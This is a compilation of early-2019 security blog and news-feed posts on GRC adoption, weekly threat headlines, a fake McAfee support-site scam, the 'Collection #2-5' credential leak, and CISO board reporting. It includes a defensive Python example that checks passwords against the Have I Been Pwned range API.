Before I start, stating some facts: – Global IT spend according to Gartner is 3.7 Trillion in 2018, and Cyber security market is 150 Billion which makes cyber security 4% of the total IT industry and growing at 10% CAGR …of all the various solutions under cyber security like Identity & Access, Application security, Network security, Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

GRC GLOBAL CYBER SECURITY MARKET
GLOBAL CYBER SECURITY MARKET

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is the identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with governance framework and various industry regulatory compliance. Any issue in corporate governance or compliance leads to increase in risk…Hence a Platform is required whose purpose is to reduce the risk in the organization. GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just a food for thought…Even a bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought coding governance structure for creating a good coding practice…similarly in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance, Risk and Compliance (GRC) is about managing your enterprise data effectively, but with data come security and privacy concerns too. So why not think of outsourcing or transferring the risk? Well, not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always remain within your organization. Hence you need to contain your risk by continuously monitoring your enterprise data. So now the challenge is managing your in-house data! (Yes, data, the buzzword: "whoever controls the data controls the world!")

To securely house the data, we need to identify which is the most critical information or PII (personally identifiable information) to be protected, and what policy needs to be crafted so that the controls applied to the identified risks stay in compliance. The GDPR, for example, sets out comprehensive checks and deterrents to protect EU citizens' data. One thing to remember is that these data protection laws are ultimately not about protecting data but about people (remember Article 17, the 'right to be forgotten', in GDPR).

Also, with digital transformation and internet proliferation, cyber fraud and crime will only increase, which means the threat to people and their privacy will keep growing!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries, much as human rights do in social life. These policies are the key to governance and to the success of the entire GRC program in an organization. Policies define the boundaries, which act as the perimeter defence that needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and that any non-compliance with these policies is tracked to closure according to the risk appetite. This standardization can be achieved through a platform called GRC!

But there are many challenges in GRC adoption. Even after more than a decade of GRC presence, I still hear incoherent objections from clients.

The three major objections are as follows:

  1. Why shift to automation when current manual process is efficient enough?
  2. We only want Audit Management Automation so why invest in Integrated Risk Management or GRC solution?
  3. Day-to-day use of the GRC features by the internal team is very low, which means adoption by the internal risk or compliance team itself is low. So how do we change this behaviour? (I faced this with one of the world's biggest stock exchanges.)

The challenge is the adoption rate of the GRC platform: many think it is an added cost and hence continue with the manual process, only to create more risk in their organization, which keeps piling up!

To add to this, with the various automation products and document management platforms available, the purpose of GRC gets lost a bit amid the chaos.

Hence I feel it is time to create a larger awareness campaign for GRC. I call it 'The GRC Movement'.

If you look at the world's biggest historical events (be it Martin Luther King, Jr.'s Civil Rights movement, Mahatma Gandhi's Satyagraha and non-cooperation movements, or the invention of the printing press), they were primarily triggered by a mass movement. Every global movement had a common goal to achieve; this collective purpose is missing in the GRC space today.

Image: mass movements (Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/)

Why are social movements important in the world? Because the collective actions of a social movement play an important role in bringing social change, and each movement arose because a common message was not being articulated or there was a lack of direction. Similarly, there is a need to create a GRC movement in enterprises. This movement will bring about a risk culture change that ensures every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in three simple ways. Organizations need a better approach to tackle cybersecurity and risk, and I propose a 360-degree view to make a GRC movement happen.

This 360-degree GRC movement rests on the following three aspects:

GRC for Enterprise (Contextual)

Are the applications or use cases of GRC platforms or products going to be different for different organizations? If yes, then what kind of use cases? They might not be different in kind, but they would be architected, developed or configured differently.

Example: every traffic signal has the same three lights globally, but the traffic model in India is different from the US, Australia or Europe (parameters like traffic density, road width and peak time all differ across economies), and similarly autonomous driving in China and Germany might be different.

When a new technology or workflow is developed, you need to renegotiate the policy, because there is no single right way of doing it but multiple wrong ways.

Example: what if a new camera comes along that sees through walls? You would want to renegotiate your corporate privacy policy! It is a continuous improvement cycle.

The true value of a GRC technology for end users or stakeholders is in its user experience. The ease with which users can create reports and dashboards or conduct a risk assessment is the key for the enterprise, and it decides the adoption and consumption rate of the GRC solution among enterprise users.

Innovation itself doesn't hurt users; users are hurt because change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise (Ownership)

The organization goes through complete chaos if the risk process is handled manually. Hence if you digitise risk, you are in more control of your data, which leads to more visibility!

As the GRC platform of the enterprise matures, it becomes the protected property or IP of the organization. It is too risky for any organization to handle governance and compliance tasks manually, as even a single missed event or incident can bring the organization down financially. The enterprise needs to be alert 24x7, but the hackers need to get in just once! The risk or compliance team within the enterprise knows the genesis of every problem, and only they can solve it, using automation to reduce effort and manual error for long-term gains.

Privacy and accountability for the data in the GRC tool is a critical aspect, hence compliance with regulations like GDPR will be key to a successful GRC journey! Without mapping controls to the policy or corporate objective, so that you can check which policy violation has happened, the core purpose of an integrated GRC platform will never be achieved. That mapping is what creates accountability in the organization!

All executives and senior leadership should know more about the regulations in their industry, as all their actions are linked to the risk and compliance of their enterprise.

Simply training employees would not be enough, hence it is crucial to carry the process maturity and standardization achieved through the GRC platform forward consistently. Revisiting the various workflows, KPIs and metrics and fine-tuning them to suit the ever-changing cyber world is the key!

The GRC platform for an already established and mature organization would be different from that for a newly formed organization.

For this, GRC management needs a VC vs. PE mindset, depending on organizational maturity.

A venture capitalist takes a start-up and grows it exponentially; a PE firm takes an already established company and grows it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field? How do we, as an entire ecosystem, develop GRC talent and skills in an enterprise?

Can a unique problem in the enterprise be solved by a unique workflow configured by that enterprise, which could then become a case study for the industry to learn from?

Has there been an increase in adoption of the GRC platform for risk and compliance records after the enhancement in user experience? The GRC group within the enterprise can contribute its learnings to the external world.

In the GRC space every organization hunts for the best practices implemented by other organizations, but this data is not publicly available, as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy, just as climate change is dealt with through global policy changes. We also need to remember that no policy is written in stone, as evolution needs to happen! So a common database of GRC best practices is the need of the hour!

The success of the GRC movement lies in its adoption by all parties simultaneously. It is in everyone's interest to collaborate and share success stories with other enterprises, without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further; that is the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence, for a successful GRC program, an organization needs a GRC vision that comprises all three dimensions above.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (the cyber security division of Dell), handling presales for the RSA Archer GRC platform in the SEA and SAARC markets. He is a cybersecurity evangelist and a GRC architect.

Starting his consulting career with Deloitte, he is a seasoned cyber security and privacy professional with end-to-end experience of delivery, sales and presales. He has managed markets such as the US, Europe and the Middle East in his previous roles.

His proposal paper on "Internet of Things" was selected for the ISF World Congress in Copenhagen (Nov 2014) and in Atlanta (2015).

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.



Security Affairs

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss

Cryptocurrency exchange QuadrigaCX has suffered a security incident after it lost control of its customers' assets. $137 million worth of

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss on Latest Hacking News.

Cyber Security Week in Review (Feb. 1)

Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Apple revoked a set of developer tools from Facebook. The two tech companies got into a tug-of-war this week over a Facebook program, which came to light, in which Facebook paid users to install a VPN on their mobile devices and then tracked their habits through it. Facebook has now ended that program.
  • Apple temporarily disabled its group FaceTime service as it fixes a vulnerability. If exploited, an attacker could potentially listen in on conversations via Apple devices’ microphones even if the user doesn’t answer a FaceTime call. Apple’s slow response to this bug has prompted New York’s attorney general to launch an investigation.
  • The U.S. filed several criminal charges against Chinese tech company Huawei. One indictment accused Huawei of attempting to steal trade secrets from mobile company T-Mobile, while another says the company worked to bypass American sanctions against Iran.

From Talos

  • Attackers are utilizing a fake job posting from Cisco Korea to infect users. Based on our research, we believe this is the latest in a long string of attacks from the same threat actor.
  • There are multiple vulnerabilities in ACD Systems' Canvas Draw 5. The vulnerable component of Canvas Draw 5 lies in the handling of TIFF and PCX images. Snort rules 39593 - 39596, 39599 - 39632, 47336, 47337 can help protect you from the exploitation of these vulnerabilities.
  • Python, as distributed by Python.org, contains an exploitable denial-of-service vulnerability in its X509 certificate parser. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. Snort rules 48854 and 48855 can protect you from the exploitation of this vulnerability.
  • Talos discovered two vulnerabilities that could allow remote code execution and memory disclosure at the kernel level in WIBU-SYSTEMS WibuKey. WibuKey is a USB key designed to protect software and intellectual property. Snort rules 47750 and 47751 can protect you from the exploitation of these vulnerabilities.

Malware roundup

  • The FormBook malware is back, this time targeting retail and hospitality companies. The information-stealer first appeared in 2016, and its use has recently risen through a new malware-hosting service.
  • The FBI and Air Force are working together to dismantle a North Korean botnet. Joanap is a remote access tool believed to be associated with the Lazarus Group APT. Snort rule 46885 can prevent Joanap from making an outbound connection.
  • A new cryptocurrency malware is targeting Macs. A variant of OSX.DarthMiner, the malware steals browser cookies and saved passwords in the Google Chrome web browser. 
  • American and Belgian authorities shut down an illegal online marketplace. xDedic, a website that concealed the location of its servers and was often used to sell personal information stolen in cyber attacks, is responsible for roughly $68 million of fraud.

The rest of the news

  • Google removed several data collection apps from the iOS App Store. The apps collected data from users' phones, browsers and routers with their consent; in exchange, Google sent gift cards to the users. However, the apps did not properly operate under Apple's enterprise developer program.
  • The United Arab Emirates has gathered a group of hackers to track adversaries of their government. Many of the members are former U.S. National Security Agency hackers. 
  • A trove of 2.2 billion login credentials is circulating among hacking groups. It is far larger than the smaller collection uncovered by a security researcher earlier this year.
  • A distributed denial-of-service attack recently broke the record for packets sent per second. Security firm Imperva says they recently stopped an attack against their client that crossed the 500 million packets per second mark. 
  • Airbus employees' data was accessed as the result of a recent data breach. The aerospace company says there was no impact to its commercial operations or intellectual property.
  • Chrome and Firefox fixed several security flaws in the latest versions of their browsers. Chrome 72 fixed 58 CVEs, including one that was rated “critical,” while Firefox patched seven CVEs, including three “critical” ones. 

Defending critical infrastructure is imperative

The Cybersecurity Tech Accords upcoming webinar and the importance of public-private partnership

Today, cyberattacks from increasingly sophisticated actors threaten organizations across every sector, and whether a Fortune 500 company or a local bakery, organizations of all sizes need to take steps to limit the dangers posed by these threats. This is the core of cybersecurity risk management: understanding potential threats and actively working to mitigate them. But while organizations large and small should protect themselves against such threats, the owners and operators of critical infrastructure have a unique additional obligation to understand risks and improve their cyber resilience in the interests of the communities, and even whole societies, that rely on their industries.

Critical infrastructure refers to the industries and institutions whose continued operation is necessary for the security and stability of a society. Energy, water, and healthcare sectors are often deemed critical infrastructure, as are essential government organizations, transportation sectors, and even entire elections systems. The organizations that own and operate this infrastructure have a responsibility to keep it up and running in the face of any challenge, which requires even more careful attention to security, particularly cybersecurity.

It is with this responsibility in mind that we are excited for the upcoming webinar from a senior malware researcher at the IT security firm ESET on the latest and most potent cyberthreats to critical infrastructure. The webinar is free to attend and will be hosted by the Cybersecurity Tech Accord on February 4, 2019.

As a signatory to the Cybersecurity Tech Accord, Microsoft is glad to see this diverse coalition of technology companies taking time to address this important issue and highlight the most significant cyberthreats to critical infrastructure. These are the types of challenges that the tech industry should be working collaboratively to address. In fact, Microsoft recently published a white paper titled Risk Management for Cybersecurity: Security Baselines on how policies can improve critical infrastructure protection by establishing outcome-focused security baselines. Such policies mandate how secure critical infrastructure systems must be while allowing industry to innovate and evolve their approaches as necessary to achieve those goals.

Critical infrastructure protection requires cooperation between the public and private sectors because, while the resilience of these sectors is a national security priority, the critical infrastructure itself is most often owned and operated by private industry and dependent on the technologies that are developed and maintained by private companies. In this dynamic, governments play an indispensable role in identifying security needs and standards for success, while industry understands its own technology and how to best meet security objectives.

The benefits of this collaboration are highlighted in the recently published report by the Organization of American States (OAS), developed in partnership with Microsoft, Critical Infrastructure Protection in Latin America and the Caribbean 2018. The report is a tremendous resource for policymakers in the region, as OAS was able to acutely identify the cybersecurity priorities and challenges of its Latin American and the Caribbean member states, while Microsoft was able to provide technical insights on how to best enable critical infrastructure owners and operators to protect their systems based on those priorities.

The upcoming webinar from ESET will doubtlessly shed additional light on the ever-changing nature of cybersecurity threats, especially as they relate to critical infrastructure, further underscoring the importance of cooperative relationships between sectors moving forward. We invite you to attend the live event; and for those who cannot attend on February 4, 2019, the webinar will be recorded and made available on the Cybersecurity Tech Accord website in the days that follow.

For a full list of upcoming webinars, and to access previous sessions on demand, visit the Cybersecurity Tech Accord website.

The post Defending critical infrastructure is imperative appeared first on Microsoft Secure.

Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure

Many of us rely on customer support websites for navigating new technology. Whether it's installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) by disguising itself as the official McAfee customer support website.

So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

  • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
  • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
  • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.

This Week in Security News: Hacker Strategies and Spyware Attacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how hackers are improving their breach strategies. Also, learn about new spyware attacks via URLs, websites, and mobile apps.

Read on: 

Informing Your Security Posture: How Cybercriminals Blend into the Background

Maintaining protection over an enterprise's critical data, systems and assets is a continual uphill battle. Hackers are bolstering their capabilities to silently breach platforms and stay under the radar.

Trend Micro: Cybersecurity Staff Feel Unsupported By Businesses

In a global survey of 1,125 IT executives, Trend Micro discovered that enterprise cybersecurity staff feel unsupported by their enterprises, with 33 percent feeling isolated in their positions.

What Enterprise Leaders Should know about Persistent Threats in 2019

As hackers continually shift and improve upon their attack and breach strategies, IT and security stakeholders must do their best to keep up and remain informed of these trends. 

Facebook Pays Teens to Install VPN That Spies on Them

Facebook has been secretly paying people to install a “Facebook Research” VPN that lets the company suck in all of a user’s phone and web activity.

ThinkPHP Vulnerability Abused by Botnets Hakai and Yowai

Cybercriminals exploit a vulnerability in websites built with the ThinkPHP framework to breach web servers, and use dictionary attacks on default credentials to take control of routers, enlisting both for distributed denial-of-service attacks.

Major iPhone FaceTime Bug Lets You Hear the Audio of the Person You Are Calling … Before They Pick Up

A bug has been discovered that lets you call anyone with FaceTime and immediately hear the audio coming from their phone — before the person on the other end has accepted or rejected the incoming call.

Various Google Play "Beauty Camera" Apps Send Users Pornographic Content, Redirect Them to Phishing Websites and Collect Their Pictures

Trend Micro discovered several beauty camera apps on Google Play that are capable of accessing remote ad configuration servers that can be used for malicious purposes. 

Microsoft Exchange Vulnerability Enables Attackers to Gain Domain Admin Privileges

Microsoft Exchange 2013 and newer versions are vulnerable to a privilege escalation attack that gives anyone with a mailbox a way to gain domain administrator rights at potentially 90% of organizations running Active Directory and Exchange.

Zero-Day Vulnerability in Total Donations Plugin Could Expose WordPress Websites to Compromise

Owners and administrators of WordPress websites that use the “Total Donations” plugin are advised to remove the plugin after a zero-day vulnerability and design flaws were seen actively exploited. 

U.S. Judge Rejects Yahoo Data Breach Settlement

A U.S. judge rejected Yahoo’s proposed settlement with millions of people whose email addresses and other personal information were stolen in the largest data breach in history, faulting the Internet services provider for a lack of transparency.

Modified TeamViewer Tool Drops Trojan Spyware on Victims

On January 20, a security researcher going by FewAtoms spotted a malicious URL in the wild. The URL is an open directory that leads would-be victims to a malicious self-extracting archive. 

Which spyware attack were you most surprised to hear about? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Hacker Strategies and Spyware Attacks appeared first on .

More than 773M email addresses victim of largest data breach

Staggering 2.2 Billion Unique Records Compiled in The Largest Data Leak Ever

If you live in a developed country, or even in a developing country, your details are most likely included in this monster compilation of stolen data shared around by thousands of strangers.
A couple of weeks ago we reported that at least 773 million email addresses, together with passwords, had surfaced on a free cloud storage service accessible by virtually everyone. Given the staggering number of records, the dump of stolen data, named ‘Collection #1’, was quickly branded by many as the most extensive data leak in history.

Hours after cybersecurity researcher Troy Hunt announced the news about ‘Collection #1’, he said that he was in possession of four more collections, named ‘collections #2-5’, and was reviewing them; he would go through all the records and decide what to do with them soon. It turned out that he was not the only one in possession of the compilations. Over the last couple of weeks, ‘collections #2-5’ have been shared among thousands of people as part of a colossal 845GB torrent. The torrent has been downloaded thousands of times and currently has hundreds of seeders sharing the information with literally anyone in the world.

‘Collection #1’ was taken off the free cloud storage server as soon as the news about the leak went viral, but ‘collections #2-5’, virtually the biggest collection of stolen data ever assembled, cannot really be taken down from torrent sites and will likely remain available for download for a very long time.

In the past, stolen data lists were offered on the Dark Web by cybercriminals for thousands of dollars. Currently, the biggest ever data leak with approximately 25 billion unique records and roughly 2.2 billion unique usernames and passwords, is freely available for download as a torrent.

Currently approximately 4 billion people in the world have access to the internet. With the latest data leak containing more than 2 billion unique emails and passwords, it is tempting to say that the personal information of half of all internet users has been stolen, compiled into this mega-leak and put up for grabs for anyone interested. Treat that figure as an upper bound: one person often owns several addresses, and many entries in such dumps are dead, throwaway or duplicate accounts, so a count of unique addresses overstates the number of people affected. Even so, the records of a large share of the people living in developed and developing countries are likely included in this large torrent, shared around by thousands of random strangers.

It is currently unknown whether the ‘collections #2-5’ torrent contains just emails and passwords, or whether it also includes sensitive information stolen from companies such as Equifax, which could include the social security numbers of almost every US citizen and permanent resident. According to analysts from the Hasso Plattner Institute, a university located in eastern Germany, the megaleak is approximately three times bigger than the initial ‘largest data leak in the world’ announced a couple of weeks ago, and contains an unprecedented amount of previously unseen stolen passwords.

As of right now, Troy Hunt, the researcher who brought the attention to ‘Collection #1’, has not yet uploaded the records from ‘collections #2-5’ to the ‘Have I Been Pwned’ website.
The records do not come from a single breach but are a compilation of tens and possibly hundreds data leaks that have happened over the years.

Why is this dangerous if the data is considered old?

What makes this leak particularly dangerous is that a data set covering, by address count, a quarter of the planet's population and more than half of all internet users is a click away from virtually anyone who wants it. If your email address or personal information was stolen from one of the previously hacked technology companies such as Dropbox, Yahoo, or LinkedIn, you have most likely already been notified and perhaps forced to change your password.

However, according to security researchers, the records in the latest leak include many previously unseen passwords and usernames. And because the torrent cannot be taken down, even inexperienced attackers can start taking advantage of the information in those lists.

Everyone, from your work colleagues and neighbors to your friends and family, can now download the data and search through it. Anyone can find your old passwords and look for a pattern that might help them guess your current one. And while passwords change, users generally do not change their email addresses often, so spammers will be using this information to send unsolicited email to billions of people for years to come.

With a leak this big, the question is not if your details have been stolen in the past, but how many times have they been taken.

What actions should you take?

Unfortunately, this is just the beginning; the stolen data will now be accessed by thousands of people who will try to take advantage of it one way or another. If you haven't changed your passwords in the last three months, we strongly encourage you to change them immediately, starting with any password you have reused across sites. Don't be tempted to use the same password over and over again; instead use a password manager that stores a unique password for every account. Most quality antivirus products come with integrated password management features, and standalone password managers are also available.

Turn on two-factor authentication wherever possible, and if you reside in the US, consider freezing your credit reports with all three major credit bureaus: Equifax, TransUnion, and Experian.
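One way to act on the ‘Have I Been Pwned’ reference above without handing your password to anyone, as an added example that is not Panda Security's or HIBP's own code: the Pwned Passwords range API works on k-anonymity, so only the first five hex characters of the password's SHA-1 are sent and the 35-character suffix is matched locally. The sample range response below is constructed for the demo (its counts are made up); `fetch_range` uses the real endpoint and is only called if you uncomment it.

```python
"""Check a password against Pwned Passwords via the k-anonymity range API.

Added example, not Panda Security's or Have I Been Pwned's code. The sample
range response is constructed for this demo; live counts differ.
"""
import hashlib
import urllib.request

RANGE_API = "https://api.pwnedpasswords.com/range/"


def sha1_upper(password: str) -> str:
    """Pwned Passwords keys on the upper-case hex SHA-1 of the UTF-8 password."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(digest: str):
    """(5-char prefix that is sent to the API, 35-char suffix compared locally)."""
    return digest[:5], digest[5:]


def parse_range_response(text: str) -> dict:
    """Parse 'SUFFIX:COUNT' lines into {suffix: count}. With Add-Padding the API
    mixes in fake entries with count 0; drop them so they never count as hits."""
    counts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        if int(count) > 0:
            counts[suffix.upper()] = int(count)
    return counts


# Constructed sample for the prefix of sha1("password"). The other suffixes
# and every count (including the one for "password") are made up.
PASSWORD_PREFIX, PASSWORD_SUFFIX = split_hash(sha1_upper("password"))
SAMPLE_RANGES = {
    PASSWORD_PREFIX: "\r\n".join([
        "0018A45C4D1DEF81644B54AB7F969B88D65:3",
        PASSWORD_SUFFIX + ":3861493",
        "00D4F6E8B2C1A3D5E7F9B1C3D5E7F9A1B3C:0",   # padding entry, count 0
    ]),
}


def offline_lookup(prefix: str) -> str:
    """Stand-in for the API that serves the constructed sample above."""
    return SAMPLE_RANGES.get(prefix, "")


def fetch_range(prefix: str) -> str:
    """Live lookup (network). Add-Padding stops a passive observer from
    inferring the prefix from the response size."""
    req = urllib.request.Request(RANGE_API + prefix, headers={
        "User-Agent": "pwned-range-demo", "Add-Padding": "true"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def pwned_count(password: str, range_lookup=offline_lookup) -> int:
    """How many times the password was seen in breaches (0 = not found)."""
    prefix, suffix = split_hash(sha1_upper(password))
    return parse_range_response(range_lookup(prefix)).get(suffix, 0)


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print(f"{pw!r}: seen {pwned_count(pw)} times (sample data)")
    # Live check against the real corpus:
    # print(pwned_count("password", fetch_range))
```

A non-zero count means the exact password is in the breach corpus and should be retired everywhere it was used; a zero only means it was not seen, not that it is strong.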

Better safe than sorry!

The post More than 773M email addresses victim of largest data breach appeared first on Panda Security Mediacenter.

Safeguarding your data from human error and phishing attacks with the cloud

This is the third article of a series, the first article is available here, and the second one is here. In a world of ransomware attacks, companies should prepare for the worst-case scenario by having smart backup strategies in place to mitigate any potential damage. The public cloud can keep your information backed up and encrypted, provided backups and encryption are actually enabled for the storage you use. Encrypting backup files in the cloud adds an extra layer of protection against unwelcome external parties. Unlike … More

The post Safeguarding your data from human error and phishing attacks with the cloud appeared first on Help Net Security.

Is your organization ready for the data explosion?

“Data is the new oil” and its quantity is growing at an exponential rate, with IDC forecasting a 50-fold increase from 2010 to 2020. In fact, by 2020, it's estimated that the new information generated each second for every human being will be roughly 1.7 megabytes. This creates bigger operational issues for organizations, with both NetOps and SecOps teams grappling to achieve superior performance, security, speed and network visibility. This delicate balancing act will become even … More

The post Is your organization ready for the data explosion? appeared first on Help Net Security.

Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate

Account takeover-based (ATO) attacks now comprise 20 percent of advanced email attacks, according to Agari’s Q1 2019 Email Fraud & Identity Deception Trends report. ATO attacks are dangerous because they are more difficult to detect than traditional attacks – compromised accounts seem legitimate to email filters and end users alike because they are sent from a real sender’s email account. “Credential phishing was already a huge risk for organizations because of the potential for data … More

The post Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate appeared first on Help Net Security.

Ten Years Strong: A Decade of Privacy and Cybersecurity Insights

In January 2019, Hunton Andrews Kurth celebrates the 10-year anniversary of our award-winning Privacy and Information Security Law Blog. Over the past decade, we have worked hard to provide timely, cutting-edge updates on the ever-evolving global privacy and cybersecurity legal landscape. Ten Years Strong: A Decade of Privacy and Cybersecurity Insights is a compilation of our blog’s top ten most read posts over the decade, and addresses some of the most transformative changes in the privacy and cybersecurity field.

Read Ten Years Strong: A Decade of Privacy and Cybersecurity Insights.

Microsoft Secure: CISO series: Talking cybersecurity with the board of directors

In today's threat landscape, boards of directors are more interested than ever before in their company's cybersecurity strategy. If you want to maintain a board's confidence, you can't wait until after an attack to start talking to them about how you are securing the enterprise. You need to engage them in your strategy early and often, with the right level of technical detail, packaged in a way that gives the board exactly what they need to know, when they need to know it.

Cyberattacks have increased in frequency and size over the years, making cybersecurity as fundamental to the overall health of the business as financial and operational controls. Todays boards of directors know this, and they are asking their executive teams to provide more transparency on how their company manages cybersecurity risks. If you are a technology leader responsible for security, achieving your goals often includes building alignment with the board.

Bret Arsenault, corporate vice president and chief information security officer (CISO) for Microsoft, was a recent guest on our CISO Spotlight Series, where he shared several of his learnings on building a relationship with the board of directors. We've distilled them down to the following three best practices:

  • Use the board's time effectively.
  • Keep the board educated on the state of cybersecurity.
  • Speak to the board's top concerns.

Use the board's time effectively

Members of your board come from a variety of different backgrounds, and they are responsible for all aspects of risk management for the business, not just security. Some board members may track the latest trends in security, but many won't. When it's time to share your security update, you need to cut through all the other distractions and land your message. This means you will want to think almost as much about how you are going to share your information as what you are going to share, keeping in mind the following tips:

  • Be concise.
  • Avoid technical jargon.
  • Provide regular updates.

This doesn't mean you should dumb down your report or avoid important technical information. It means you need to adequately prepare. It may take several weeks to analyze internal security data, understand key trends, and distill it down to a 10-page report that can be presented in 30 to 60 minutes. Quarterly updates will help you learn what should be included in those 10 pages, and it will give you the opportunity to build on prior reports as the board gets more familiar with your strategy. No matter what, adequate planning can make a big difference in how your report is received.

Keep the board educated on the state of cybersecurity

Stories about security breaches get a lot of attention, and your board may hope you can prevent an attack from ever happening. A key aspect of your role is educating them on the reasons why no company will ever be 100 percent secure. The real differentiation is how effectively a company responds to and recovers from an inevitable incident.

You can also help your board understand the security landscape better with analysis of the latest security incidents and updates on cybersecurity regulations and legislation. Understanding these trends will help you align resources to best protect the company and stay compliant with regional security laws.

Speak to the board's top concerns

As you develop your content, keep in mind that the best way to get the board's attention is by aligning your messages to their top concerns. Many boards are focused on the following key questions:

  • How well is the company managing their risk posture?
  • What is the governance structure?
  • How is the company preparing for the future?

To address these questions, Bret sticks to the following talking points:

  • Technical debt: An ongoing analysis of legacy systems and technologies and their security vulnerabilities.
  • Governance: An accounting of how security practices and tools measure up against the security model the company is benchmarked against.
  • Accrued liability: A strategy to future-proof the company to avoid additional debts and deficits.

When it comes to effectively working with the board and other executives across your organization, a CISO should focus on four primary functions: manage risk, oversee technical architecture, implement operational efficiency, and most importantly, enable the business. In the past, CISOs were completely focused on technical architecture. Good CISOs today, and those who want to be successful in the future, understand that they need to balance all four responsibilities.

Learn more

Be sure to check out the interview with Bret in Part 1 of the CISO Spotlight Series, Security is Everyone's Business, to hear firsthand his recommendations for talking to the board. And in Part 2, Bret walks through how to talk about security attacks and risk management with the board.

The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great reference if you are searching for a benchmark model.

To read more blogs from the series, visit the CISO series page.

The post CISO series: Talking cybersecurity with the board of directors appeared first on Microsoft Secure.




Radware Blog: Attackers Are Leveraging Automation

Cybercriminals are weaponizing automation and machine learning to create increasingly evasive attack vectors, and the internet of things (IoT) has proven to be the catalyst driving this trend. IoT is the birthplace of many of the new types of automated bots and malware. At the forefront are botnets, which are increasingly sophisticated, lethal and highly automated digitized […]

The post Attackers Are Leveraging Automation appeared first on Radware Blog.




Taking ethical action in identity: 5 steps for better biometrics

Glance at your phone. Tap a screen. Secure access granted! This is the power of biometric identity at work. The convenience of unlocking your phone with a fingertip or your face is undeniable. But ethical issues abound in the biometrics field. The film Minority Report demonstrated one possible future, in terms of precise advertising targeting based on a face. But the Spielberg film also demonstrated some of the downsides of biometrics – the stunning lack … More

The post Taking ethical action in identity: 5 steps for better biometrics appeared first on Help Net Security.

eCommerce credit card fraud is nearly an inevitability

Riskified surveyed 5,000 US-based consumers aged 18 and older about their online shopping behaviors, experience with and prevalence of credit card fraud, repeat shopping likelihood and customer satisfaction to develop a full picture of how consumers react to a number of common shopping experiences. The results are worrisome for both consumers and merchants, as roughly half of respondents reported experience with credit card fraud and 30% had their purchase wrongly declined, with a corresponding negative … More

The post eCommerce credit card fraud is nearly an inevitability appeared first on Help Net Security.

Free training course material on network forensics for cybersecurity specialists

Based on current best practices, the training includes performance indicators and means that will help those who take it increase their operational skills of tackling cyber incidents. Network forensics is more important than ever, since more and more data is sent via networks and the internet. When there is a security incident, network forensics can help reduce the time needed to go from Detection to Containment – an essential step in any major security incident. … More

The post Free training course material on network forensics for cybersecurity specialists appeared first on Help Net Security.

